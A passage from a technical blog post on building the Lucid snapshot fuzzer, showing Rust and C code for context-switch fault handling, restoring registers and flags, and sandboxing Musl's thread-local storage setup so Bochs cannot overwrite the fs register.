    <span class="c1">// null, then Bochs learns at start time that it is running under Lucid</span>
    <span class="c1">//</span>
    <span class="c1">// We don't really care about execution order as long as we specify clobbers</span>
    <span class="c1">// with out/lateout, that way the compiler doesn't allocate a register we </span>
    <span class="c1">// then immediately clobber</span>
    <span class="k">unsafe</span> <span class="p">{</span>
        <span class="nd">asm!</span><span class="p">(</span>
            <span class="s">"xor rdx, rdx"</span><span class="p">,</span>
            <span class="s">"mov rsp, {0}"</span><span class="p">,</span>
            <span class="s">"mov r15, {1}"</span><span class="p">,</span>
            <span class="s">"jmp rax"</span><span class="p">,</span>
            <span class="k">in</span><span class="p">(</span><span class="n">reg</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">context</span><span class="p">)</span><span class="py">.bochs_rsp</span><span class="p">,</span>
            <span class="k">in</span><span class="p">(</span><span class="n">reg</span><span class="p">)</span> <span class="n">context</span><span class="p">,</span>
            <span class="k">in</span><span class="p">(</span><span class="s">"rax"</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">context</span><span class="p">)</span><span class="py">.bochs_entry</span><span class="p">,</span>
            <span class="nf">lateout</span><span class="p">(</span><span class="s">"rax"</span><span class="p">)</span> <span class="n">_</span><span class="p">,</span>   <span class="c1">// Clobber (inout so no conflict with in)</span>
            <span class="nf">out</span><span class="p">(</span><span class="s">"rdx"</span><span class="p">)</span> <span class="n">_</span><span class="p">,</span>       <span class="c1">// Clobber</span>
            <span class="nf">out</span><span class="p">(</span><span class="s">"r15"</span><span class="p">)</span> <span class="n">_</span><span class="p">,</span>       <span class="c1">// Clobber</span>
        <span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Full-blown context-switching like this allows us to encounter a <code class="language-plaintext highlighter-rouge">Fault</code> and then pass that error back to Lucid for handling. In the <code class="language-plaintext highlighter-rouge">fault_handler</code>, we set the <code class="language-plaintext highlighter-rouge">Fault</code> type in the execution context, and then we attempt to restore execution back to Lucid:</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Where we handle faults that may occur when context-switching from Bochs. We</span>
<span class="c1">// just want to make the fault visible to Lucid so we set it in the context,</span>
<span class="c1">// then we try to restore Lucid execution from its last-known good state</span>
<span class="k">pub</span> <span class="k">fn</span> <span class="nf">fault_handler</span><span class="p">(</span><span class="n">contextp</span><span class="p">:</span> <span class="o">*</span><span class="k">mut</span> <span class="n">LucidContext</span><span class="p">,</span> <span class="n">fault</span><span class="p">:</span> <span class="n">Fault</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">let</span> <span class="n">context</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="o">*</span><span class="n">contextp</span> <span class="p">};</span>
    <span class="k">match</span> <span class="n">fault</span> <span class="p">{</span>
        <span class="nn">Fault</span><span class="p">::</span><span class="nb">Success</span> <span class="k">=&gt;</span> <span class="n">context</span><span class="py">.fault</span> <span class="o">=</span> <span class="nn">Fault</span><span class="p">::</span><span class="nb">Success</span><span class="p">,</span>
        <span class="o">...</span>
    <span class="p">}</span>

    <span class="c1">// Attempt to restore Lucid execution</span>
    <span class="nf">restore_lucid_execution</span><span class="p">(</span><span class="n">contextp</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// We use this function to restore Lucid execution to its last known good state</span>
<span class="c1">// This is just really trying to plumb up a fault to a level that is capable of</span>
<span class="c1">// discerning what action to take. Right now, we probably just call it fatal. </span>
<span class="c1">// We don't really deal with double-faults, it doesn't make much sense at the</span>
<span class="c1">// moment when a single-fault will likely be fatal already. Maybe later?</span>
<span class="k">fn</span> <span class="nf">restore_lucid_execution</span><span class="p">(</span><span class="n">contextp</span><span class="p">:</span> <span class="o">*</span><span class="k">mut</span> <span class="n">LucidContext</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">let</span> <span class="n">context</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="o">*</span><span class="n">contextp</span> <span class="p">};</span>
    
    <span class="c1">// Fault should be set, but change the execution mode now since we're</span>
    <span class="c1">// jumping back to Lucid</span>
    <span class="n">context</span><span class="py">.mode</span> <span class="o">=</span> <span class="nn">ExecMode</span><span class="p">::</span><span class="n">Lucid</span><span class="p">;</span>

    <span class="c1">// Restore extended state</span>
    <span class="k">let</span> <span class="n">save_area</span> <span class="o">=</span> <span class="n">context</span><span class="py">.lucid_save_area</span><span class="p">;</span>
    <span class="k">let</span> <span class="n">save_inst</span> <span class="o">=</span> <span class="n">context</span><span class="py">.save_inst</span><span class="p">;</span>
    <span class="k">match</span> <span class="n">save_inst</span> <span class="p">{</span>
        <span class="nn">SaveInst</span><span class="p">::</span><span class="n">XSave64</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">// Retrieve XCR0 value, this will serve as our save mask</span>
            <span class="k">let</span> <span class="n">xcr0</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="nf">_xgetbv</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="p">};</span>

            <span class="c1">// Call xrstor to restore the extended state from Lucid's save area</span>
            <span class="k">unsafe</span> <span class="p">{</span> <span class="nf">_xrstor64</span><span class="p">(</span><span class="n">save_area</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="nb">u8</span><span class="p">,</span> <span class="n">xcr0</span><span class="p">);</span> <span class="p">}</span>             
        <span class="p">},</span>
        <span class="nn">SaveInst</span><span class="p">::</span><span class="n">FxSave64</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">// Call fxrstor to restore the extended state from Lucid's save area</span>
            <span class="k">unsafe</span> <span class="p">{</span> <span class="nf">_fxrstor64</span><span class="p">(</span><span class="n">save_area</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="nb">u8</span><span class="p">);</span> <span class="p">}</span>
        <span class="p">},</span>
        <span class="n">_</span> <span class="k">=&gt;</span> <span class="p">(),</span> <span class="c1">// NoSave</span>
    <span class="p">}</span>

    <span class="c1">// Next, we need to restore our GPRs. This is kind of different order than</span>
    <span class="c1">// returning from a successful context switch since normally we'd still be</span>
    <span class="c1">// using our own stack; however right now, we still have Bochs' stack, so</span>
    <span class="c1">// we need to recover our own Lucid stack which is saved as RSP in our </span>
    <span class="c1">// register bank</span>
    <span class="k">let</span> <span class="n">lucid_regsp</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">context</span><span class="py">.lucid_regs</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="n">_</span><span class="p">;</span>

    <span class="c1">// Move that pointer into R14 and restore our GPRs. After that we have the</span>
    <span class="c1">// RSP value that we saved when we called into context_switch, this RSP was</span>
    <span class="c1">// then subtracted from by 0x8 for the pushfq operation that comes right</span>
    <span class="c1">// after. So in order to recover our CPU flags, we need to manually sub</span>
    <span class="c1">// 0x8 from the stack pointer. Pop the CPU flags back into place, and then </span>
    <span class="c1">// return to the last known good Lucid state</span>
    <span class="k">unsafe</span> <span class="p">{</span>
        <span class="nd">asm!</span><span class="p">(</span>
            <span class="s">"mov r14, {0}"</span><span class="p">,</span>
            <span class="s">"mov rax, [r14 + 0x0]"</span><span class="p">,</span>
            <span class="s">"mov rbx, [r14 + 0x8]"</span><span class="p">,</span>
            <span class="s">"mov rcx, [r14 + 0x10]"</span><span class="p">,</span>
            <span class="s">"mov rdx, [r14 + 0x18]"</span><span class="p">,</span>
            <span class="s">"mov rsi, [r14 + 0x20]"</span><span class="p">,</span>
            <span class="s">"mov rdi, [r14 + 0x28]"</span><span class="p">,</span>
            <span class="s">"mov rbp, [r14 + 0x30]"</span><span class="p">,</span>
            <span class="s">"mov rsp, [r14 + 0x38]"</span><span class="p">,</span>
            <span class="s">"mov r8, [r14 + 0x40]"</span><span class="p">,</span>
            <span class="s">"mov r9, [r14 + 0x48]"</span><span class="p">,</span>
            <span class="s">"mov r10, [r14 + 0x50]"</span><span class="p">,</span>
            <span class="s">"mov r11, [r14 + 0x58]"</span><span class="p">,</span>
            <span class="s">"mov r12, [r14 + 0x60]"</span><span class="p">,</span>
            <span class="s">"mov r13, [r14 + 0x68]"</span><span class="p">,</span>
            <span class="s">"mov r15, [r14 + 0x78]"</span><span class="p">,</span>
            <span class="s">"mov r14, [r14 + 0x70]"</span><span class="p">,</span>
            <span class="s">"sub rsp, 0x8"</span><span class="p">,</span>
            <span class="s">"popfq"</span><span class="p">,</span>
            <span class="s">"ret"</span><span class="p">,</span>
            <span class="k">in</span><span class="p">(</span><span class="n">reg</span><span class="p">)</span> <span class="n">lucid_regsp</span><span class="p">,</span>
        <span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
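<p>The stack arithmetic at the end of that routine (<code class="language-plaintext highlighter-rouge">sub rsp, 0x8</code>, <code class="language-plaintext highlighter-rouge">popfq</code>, <code class="language-plaintext highlighter-rouge">ret</code>) is easy to get wrong, so here is a toy model that walks through it. None of this is Lucid code: <code class="language-plaintext highlighter-rouge">ToyCpu</code> and <code class="language-plaintext highlighter-rouge">simulate</code> are hypothetical, the addresses are arbitrary, and it assumes, following the comments above, that the RSP recorded in the register bank is the value at entry to <code class="language-plaintext highlighter-rouge">context_switch</code>, just before <code class="language-plaintext highlighter-rouge">pushfq</code>.</p>

```rust
use std::collections::HashMap;

// Toy model of a downward-growing stack of 8-byte slots, used only to check
// the pointer arithmetic.
pub struct ToyCpu {
    pub rsp: u64,
    pub rflags: u64,
    pub rip: u64,
    stack: HashMap<u64, u64>,
}

impl ToyCpu {
    fn push(&mut self, value: u64) {
        self.rsp -= 8;
        self.stack.insert(self.rsp, value);
    }

    fn pop(&mut self) -> u64 {
        let value = self.stack[&self.rsp];
        self.rsp += 8;
        value
    }
}

pub fn simulate(return_addr: u64, flags: u64) -> ToyCpu {
    let mut cpu = ToyCpu { rsp: 0x8000, rflags: flags, rip: 0, stack: HashMap::new() };

    // `call qword ptr [r15]` pushes the return address.
    cpu.push(return_addr);
    // Assumption: this entry-time RSP is what ends up in the register bank.
    let saved_rsp = cpu.rsp;
    // `pushfq` at the top of context_switch stores the flags just below it.
    let entry_flags = cpu.rflags;
    cpu.push(entry_flags);
    // The scratch pushes of r14/r13 are omitted: those registers are reloaded
    // from the register bank, not from the stack.

    // Bochs then runs on its own stack with its own flags.
    cpu.rsp = 0xdead_0000;
    cpu.rflags = 0;

    // Restore path, mirroring the tail of the inline assembly.
    cpu.rsp = saved_rsp;      // mov rsp, [r14 + 0x38]
    cpu.rsp -= 8;             // sub rsp, 0x8
    cpu.rflags = cpu.pop();   // popfq
    cpu.rip = cpu.pop();      // ret
    cpu
}

fn main() {
    let cpu = simulate(0x40_1000, 0x246);
    println!("rip={:#x} rflags={:#x} rsp={:#x}", cpu.rip, cpu.rflags, cpu.rsp);
}
```

<p>In this model the flags and return address come back intact and the stack pointer ends where it was before the original call, which is the behavior the restore sequence relies on.</p>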

<p>As you can see, restoring Lucid state and resuming execution is quite involved. One tricky thing we had to deal with was the fact that right now, when a <code class="language-plaintext highlighter-rouge">Fault</code> occurs, we are likely operating in Bochs mode, which means that our stack is Bochs’ stack and not Lucid’s. So even though this is technically just a context-switch, we had to change the order around a little bit to pop Lucid’s saved state into our current state and resume execution. Now when Lucid calls functions that context-switch, it can simply check the “return” value of such functions by checking if there was a <code class="language-plaintext highlighter-rouge">Fault</code> noted in the execution context like so:</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code>	<span class="c1">// Start executing Bochs</span>
    <span class="nd">prompt!</span><span class="p">(</span><span class="s">"Starting Bochs..."</span><span class="p">);</span>
    <span class="nf">start_bochs</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">lucid_context</span><span class="p">);</span>

    <span class="c1">// Check to see if any faults occurred during Bochs execution</span>
    <span class="k">if</span> <span class="o">!</span><span class="nd">matches!</span><span class="p">(</span><span class="n">lucid_context</span><span class="py">.fault</span><span class="p">,</span> <span class="nn">Fault</span><span class="p">::</span><span class="nb">Success</span><span class="p">)</span> <span class="p">{</span>
        <span class="nd">fatal!</span><span class="p">(</span><span class="nn">LucidErr</span><span class="p">::</span><span class="nf">from_fault</span><span class="p">(</span><span class="n">lucid_context</span><span class="py">.fault</span><span class="p">));</span>
    <span class="p">}</span>
</code></pre></div></div>

<p>Pretty neat imo!</p>
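<p>The check-the-context-after-the-call pattern can also be wrapped in a small helper. The following is only a sketch under assumptions: the post shows the <code class="language-plaintext highlighter-rouge">Fault::Success</code> and <code class="language-plaintext highlighter-rouge">Fault::BadLucidExit</code> variants and a <code class="language-plaintext highlighter-rouge">LucidErr::from_fault</code> call, but the type definitions, the error messages, and the <code class="language-plaintext highlighter-rouge">check_fault</code> helper here are hypothetical.</p>

```rust
// Only these two variants appear in the post; the real enum likely has more.
#[derive(Clone, Copy, Debug, PartialEq)]
pub enum Fault {
    Success,
    BadLucidExit,
}

// Hypothetical shape for the higher-level error type.
#[derive(Debug, PartialEq)]
pub struct LucidErr {
    pub message: String,
}

impl LucidErr {
    // Assumed conversion: map each fault to a human-readable error.
    pub fn from_fault(fault: Fault) -> LucidErr {
        let message = match fault {
            Fault::Success => "no fault".to_string(),
            Fault::BadLucidExit => "unexpected exit reason in Lucid mode".to_string(),
        };
        LucidErr { message }
    }
}

// Hypothetical context holding only the field this sketch needs.
pub struct Context {
    pub fault: Fault,
}

// Turn the fault recorded in the context into a Result for the caller.
pub fn check_fault(context: &Context) -> Result<(), LucidErr> {
    if matches!(context.fault, Fault::Success) {
        Ok(())
    } else {
        Err(LucidErr::from_fault(context.fault))
    }
}

fn main() {
    let clean = Context { fault: Fault::Success };
    let broken = Context { fault: Fault::BadLucidExit };
    println!("{:?}", check_fault(&clean));
    println!("{:?}", check_fault(&broken));
}
```

<p>Returning a <code class="language-plaintext highlighter-rouge">Result</code> would let callers decide per call site whether a fault is fatal, should that ever stop being the blanket policy.</p>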

<h2 id="sandboxing-thread-local-storage">Sandboxing Thread-Local-Storage</h2>

<p>Coming into this project, I honestly didn’t know much about thread-local-storage (TLS) except that it was some magic per-thread area of memory that did <em>stuff</em>. That is still the entirety of my knowledge really, except now I’ve seen some code that allocates that memory and initializes it, which helps me appreciate what is really going on.
Once I implemented the <code class="language-plaintext highlighter-rouge">Fault</code> system discussed above, I noticed that Lucid would segfault when exiting. After some debugging, I realized it was calling a function pointer that held a bogus address. How could this have happened? Well, after some digging, I noticed that right before that function call, an offset from the <code class="language-plaintext highlighter-rouge">fs</code> register was used to load the address from memory. Typically, <code class="language-plaintext highlighter-rouge">fs</code> is used to access TLS. So at that point, I had a strong suspicion that Bochs had somehow corrupted the value of my <code class="language-plaintext highlighter-rouge">fs</code> register. So I did a quick grep through Musl looking for <code class="language-plaintext highlighter-rouge">fs</code> register access and found the following:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* Copyright 2011-2012 Nicholas J. Kain, licensed under standard MIT license */</span>
<span class="p">.</span><span class="n">text</span>
<span class="p">.</span><span class="n">global</span> <span class="n">__set_thread_area</span>
<span class="p">.</span><span class="n">hidden</span> <span class="n">__set_thread_area</span>
<span class="p">.</span><span class="n">type</span> <span class="n">__set_thread_area</span><span class="p">,</span><span class="err">@</span><span class="n">function</span>
<span class="n">__set_thread_area</span><span class="o">:</span>
	<span class="n">mov</span> <span class="o">%</span><span class="n">rdi</span><span class="p">,</span><span class="o">%</span><span class="n">rsi</span>           <span class="cm">/* shift for syscall */</span>
	<span class="n">movl</span> <span class="err">$</span><span class="mh">0x1002</span><span class="p">,</span><span class="o">%</span><span class="n">edi</span>       <span class="cm">/* SET_FS register */</span>
	<span class="n">movl</span> <span class="err">$</span><span class="mi">158</span><span class="p">,</span><span class="o">%</span><span class="n">eax</span>          <span class="cm">/* set fs segment to */</span>
	<span class="n">syscall</span>                 <span class="cm">/* arch_prctl(SET_FS, arg)*/</span>
	<span class="n">ret</span>
</code></pre></div></div>

<p>So this function, <code class="language-plaintext highlighter-rouge">__set_thread_area</code>, uses an inline <code class="language-plaintext highlighter-rouge">syscall</code> instruction to call <code class="language-plaintext highlighter-rouge">arch_prctl</code> to directly manipulate the <code class="language-plaintext highlighter-rouge">fs</code> register. This made a lot of sense: if the <code class="language-plaintext highlighter-rouge">syscall</code> instruction was indeed executed, we wouldn’t intercept it with our syscall sandboxing infrastructure because we never instrumented it. We’ve only instrumented what boils down to the <code class="language-plaintext highlighter-rouge">syscall()</code> function wrapper in Musl. So this would escape our sandbox and directly manipulate <code class="language-plaintext highlighter-rouge">fs</code>. Sure enough, I discovered that this function is called during TLS initialization in <code class="language-plaintext highlighter-rouge">src/env/__init_tls.c</code>:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">__init_tp</span><span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="n">p</span><span class="p">)</span>
<span class="p">{</span>
	<span class="n">pthread_t</span> <span class="n">td</span> <span class="o">=</span> <span class="n">p</span><span class="p">;</span>
	<span class="n">td</span><span class="o">-&gt;</span><span class="n">self</span> <span class="o">=</span> <span class="n">td</span><span class="p">;</span>
	<span class="kt">int</span> <span class="n">r</span> <span class="o">=</span> <span class="n">__set_thread_area</span><span class="p">(</span><span class="n">TP_ADJ</span><span class="p">(</span><span class="n">p</span><span class="p">));</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">r</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">r</span><span class="p">)</span> <span class="n">libc</span><span class="p">.</span><span class="n">can_do_threads</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
	<span class="n">td</span><span class="o">-&gt;</span><span class="n">detach_state</span> <span class="o">=</span> <span class="n">DT_JOINABLE</span><span class="p">;</span>
	<span class="n">td</span><span class="o">-&gt;</span><span class="n">tid</span> <span class="o">=</span> <span class="n">__syscall</span><span class="p">(</span><span class="n">SYS_set_tid_address</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">__thread_list_lock</span><span class="p">);</span>
	<span class="n">td</span><span class="o">-&gt;</span><span class="n">locale</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">libc</span><span class="p">.</span><span class="n">global_locale</span><span class="p">;</span>
	<span class="n">td</span><span class="o">-&gt;</span><span class="n">robust_list</span><span class="p">.</span><span class="n">head</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">td</span><span class="o">-&gt;</span><span class="n">robust_list</span><span class="p">.</span><span class="n">head</span><span class="p">;</span>
	<span class="n">td</span><span class="o">-&gt;</span><span class="n">sysinfo</span> <span class="o">=</span> <span class="n">__sysinfo</span><span class="p">;</span>
	<span class="n">td</span><span class="o">-&gt;</span><span class="n">next</span> <span class="o">=</span> <span class="n">td</span><span class="o">-&gt;</span><span class="n">prev</span> <span class="o">=</span> <span class="n">td</span><span class="p">;</span>
	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>So in this <code class="language-plaintext highlighter-rouge">__init_tp</code> function, we’re given a pointer, and then we use the <code class="language-plaintext highlighter-rouge">TP_ADJ</code> macro to do some arithmetic on the pointer and pass that value to <code class="language-plaintext highlighter-rouge">__set_thread_area</code> so that <code class="language-plaintext highlighter-rouge">fs</code> is manipulated. Great, now how do we sandbox this? I wanted to avoid messing with the inline assembly in <code class="language-plaintext highlighter-rouge">__set_thread_area</code> itself, so I just changed the source so that Musl would instead utilize the <code class="language-plaintext highlighter-rouge">syscall()</code> wrapper function, which calls our instrumented syscall functions under the hood, like so:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#ifndef ARCH_SET_FS
#define ARCH_SET_FS 0x1002
#endif </span><span class="cm">/* ARCH_SET_FS */</span><span class="cp">
</span>
<span class="kt">int</span> <span class="nf">__init_tp</span><span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="n">p</span><span class="p">)</span>
<span class="p">{</span>
	<span class="n">pthread_t</span> <span class="n">td</span> <span class="o">=</span> <span class="n">p</span><span class="p">;</span>
	<span class="n">td</span><span class="o">-&gt;</span><span class="n">self</span> <span class="o">=</span> <span class="n">td</span><span class="p">;</span>
	<span class="kt">int</span> <span class="n">r</span> <span class="o">=</span> <span class="n">syscall</span><span class="p">(</span><span class="n">SYS_arch_prctl</span><span class="p">,</span> <span class="n">ARCH_SET_FS</span><span class="p">,</span> <span class="n">TP_ADJ</span><span class="p">(</span><span class="n">p</span><span class="p">));</span>
	<span class="c1">//int r = __set_thread_area(TP_ADJ(p));</span>
</code></pre></div></div>
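<p>On the fuzzer side, the handler for this redirected call can be tiny. The following is a minimal sketch, not Lucid’s actual handler: the names <code class="language-plaintext highlighter-rouge">handle_syscall</code> and <code class="language-plaintext highlighter-rouge">Handled</code> are hypothetical, and it assumes the x86_64 syscall number for <code class="language-plaintext highlighter-rouge">arch_prctl</code> (158) together with the <code class="language-plaintext highlighter-rouge">ARCH_SET_FS</code> value from the patch above. It acknowledges the request without ever touching the real <code class="language-plaintext highlighter-rouge">fs</code> register:</p>

```rust
// Hypothetical sketch of intercepting the redirected `arch_prctl` call.
// None of these names come from Lucid itself.

/// x86_64 syscall number for `arch_prctl`.
pub const SYS_ARCH_PRCTL: u64 = 158;
/// Sub-command used by Musl to set the `fs` base (same value as in the patch).
pub const ARCH_SET_FS: u64 = 0x1002;

/// Outcome of trying to handle a sandboxed syscall.
#[derive(Debug, PartialEq)]
pub enum Handled {
    /// Value handed back to the guest as the syscall return value.
    Return(u64),
    /// Anything this sketch does not model.
    Unsupported,
}

/// Dispatch on the syscall number; `a1` and `a2` are the first two arguments.
pub fn handle_syscall(nr: u64, a1: u64, _a2: u64) -> Handled {
    match nr {
        // Pretend the request succeeded. The host `fs` register is left
        // alone, so the fuzzer's own TLS stays intact.
        SYS_ARCH_PRCTL if a1 == ARCH_SET_FS => Handled::Return(0),
        _ => Handled::Unsupported,
    }
}
```

<p>Returning <code class="language-plaintext highlighter-rouge">0</code> matters here because <code class="language-plaintext highlighter-rouge">__init_tp</code> treats a negative result as fatal and only enables threads when the result is exactly zero.</p>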

<p>Now, we can intercept this syscall in Lucid and effectively do nothing really. As long as there are not other direct accesses to <code class="language-plaintext highlighter-rouge">fs</code> (and there might be still!), we should be fine here. I also adjusted the Musl code so that if we’re running under Lucid, we provide a TLS-area via the execution context by just creating a mock area of what Musl calls the <code class="language-plaintext highlighter-rouge">builtin_tls</code>:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="k">struct</span> <span class="n">builtin_tls</span> <span class="p">{</span>
	<span class="kt">char</span> <span class="n">c</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">pthread</span> <span class="n">pt</span><span class="p">;</span>
	<span class="kt">void</span> <span class="o">*</span><span class="n">space</span><span class="p">[</span><span class="mi">16</span><span class="p">];</span>
<span class="p">}</span> <span class="n">builtin_tls</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span>
</code></pre></div></div>

<p>So now, when <code class="language-plaintext highlighter-rouge">__init_tp</code> is called, the pointer it is given points to our own TLS block of memory that we’ve created in the execution context, so we now have access to things like <code class="language-plaintext highlighter-rouge">errno</code> in Lucid:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">if</span> <span class="p">(</span><span class="n">libc</span><span class="p">.</span><span class="n">tls_size</span> <span class="o">&gt;</span> <span class="k">sizeof</span> <span class="n">builtin_tls</span><span class="p">)</span> <span class="p">{</span>
<span class="cp">#ifndef SYS_mmap2
#define SYS_mmap2 SYS_mmap
#endif
</span>		<span class="n">__asm__</span> <span class="n">__volatile__</span> <span class="p">(</span><span class="s">"int3"</span><span class="p">);</span> <span class="c1">// Added by me just in case</span>
		<span class="n">mem</span> <span class="o">=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">__syscall</span><span class="p">(</span>
			<span class="n">SYS_mmap2</span><span class="p">,</span>
			<span class="mi">0</span><span class="p">,</span> <span class="n">libc</span><span class="p">.</span><span class="n">tls_size</span><span class="p">,</span> <span class="n">PROT_READ</span><span class="o">|</span><span class="n">PROT_WRITE</span><span class="p">,</span>
			<span class="n">MAP_ANONYMOUS</span><span class="o">|</span><span class="n">MAP_PRIVATE</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
		<span class="cm">/* -4095...-1 cast to void * will crash on dereference anyway,
		 * so don't bloat the init code checking for error codes and
		 * explicitly calling a_crash(). */</span>
	<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
		<span class="c1">// Check to see if we're running under Lucid or not</span>
		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">g_lucid_ctx</span><span class="p">)</span> <span class="p">{</span> <span class="n">mem</span> <span class="o">=</span> <span class="n">builtin_tls</span><span class="p">;</span> <span class="p">}</span>
		<span class="k">else</span> <span class="p">{</span> <span class="n">mem</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">g_lucid_ctx</span><span class="o">-&gt;</span><span class="n">tls</span><span class="p">;</span> <span class="p">}</span>
	<span class="p">}</span>

	<span class="cm">/* Failure to initialize thread pointer is always fatal. */</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">__init_tp</span><span class="p">(</span><span class="n">__copy_tls</span><span class="p">(</span><span class="n">mem</span><span class="p">))</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
		<span class="n">a_crash</span><span class="p">();</span>
</code></pre></div></div>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">#[repr(C)]</span>
<span class="nd">#[derive(Clone)]</span>
<span class="k">pub</span> <span class="k">struct</span> <span class="n">Tls</span> <span class="p">{</span>
    <span class="n">padding0</span><span class="p">:</span> <span class="p">[</span><span class="nb">u8</span><span class="p">;</span> <span class="mi">8</span><span class="p">],</span> <span class="c1">// char c</span>
    <span class="n">padding1</span><span class="p">:</span> <span class="p">[</span><span class="nb">u8</span><span class="p">;</span> <span class="mi">52</span><span class="p">],</span> <span class="c1">// Padding to offset of errno which is 52-bytes</span>
    <span class="k">pub</span> <span class="n">errno</span><span class="p">:</span> <span class="nb">i32</span><span class="p">,</span>
    <span class="n">padding2</span><span class="p">:</span> <span class="p">[</span><span class="nb">u8</span><span class="p">;</span> <span class="mi">144</span><span class="p">],</span> <span class="c1">// Additional padding to get to 200-bytes total</span>
    <span class="n">padding3</span><span class="p">:</span> <span class="p">[</span><span class="nb">u8</span><span class="p">;</span> <span class="mi">128</span><span class="p">],</span> <span class="c1">// 16 void * values</span>
<span class="p">}</span>
</code></pre></div></div>

<p>So now for example, if during a <code class="language-plaintext highlighter-rouge">read</code> syscall, we get passed a NULL buffer, we can return an error code and set <code class="language-plaintext highlighter-rouge">errno</code> appropriately <em>from the syscall handler in Lucid</em>:</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code>            <span class="c1">// Now we need to make sure the buffer passed to read isn't NULL</span>
            <span class="k">let</span> <span class="n">buf_p</span> <span class="o">=</span> <span class="n">a2</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">u8</span><span class="p">;</span>
            <span class="k">if</span> <span class="n">buf_p</span><span class="nf">.is_null</span><span class="p">()</span> <span class="p">{</span>
                <span class="n">context</span><span class="py">.tls.errno</span> <span class="o">=</span> <span class="nn">libc</span><span class="p">::</span><span class="n">EINVAL</span><span class="p">;</span>
                <span class="k">return</span> <span class="o">-</span><span class="mi">1_i64</span> <span class="k">as</span> <span class="nb">u64</span><span class="p">;</span>
            <span class="p">}</span>
</code></pre></div></div>
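<p>Since this only works if the Rust view of the TLS block lines up byte-for-byte with Musl’s <code class="language-plaintext highlighter-rouge">builtin_tls</code>, a quick layout check is cheap insurance. This is a sketch that assumes the sizes given in the struct comments above (an 8-byte slot for <code class="language-plaintext highlighter-rouge">char c</code>, <code class="language-plaintext highlighter-rouge">errno</code> 52 bytes into a 200-byte <code class="language-plaintext highlighter-rouge">struct pthread</code>); the helpers <code class="language-plaintext highlighter-rouge">errno_offset</code> and <code class="language-plaintext highlighter-rouge">tls_size</code> are hypothetical:</p>

```rust
// Mirror of the `Tls` struct from the post; the field sizes are taken from
// its comments and are assumptions about the Musl build being targeted.
#[repr(C)]
#[derive(Clone)]
pub struct Tls {
    padding0: [u8; 8],   // `char c`, padded up to the start of `struct pthread`
    padding1: [u8; 52],  // bytes of `struct pthread` that precede `errno`
    pub errno: i32,
    padding2: [u8; 144], // rest of the (assumed) 200-byte `struct pthread`
    padding3: [u8; 128], // `void *space[16]`
}

impl Tls {
    /// Zero-initialized TLS block.
    pub fn new() -> Self {
        Tls {
            padding0: [0; 8],
            padding1: [0; 52],
            errno: 0,
            padding2: [0; 144],
            padding3: [0; 128],
        }
    }
}

/// Hypothetical helper: byte offset of `errno` from the start of the block.
pub fn errno_offset() -> usize {
    let tls = Tls::new();
    let base = &tls as *const Tls as usize;
    let field = &tls.errno as *const i32 as usize;
    field - base
}

/// Hypothetical helper: total size of the mock TLS block in bytes.
pub fn tls_size() -> usize {
    std::mem::size_of::<Tls>()
}
```

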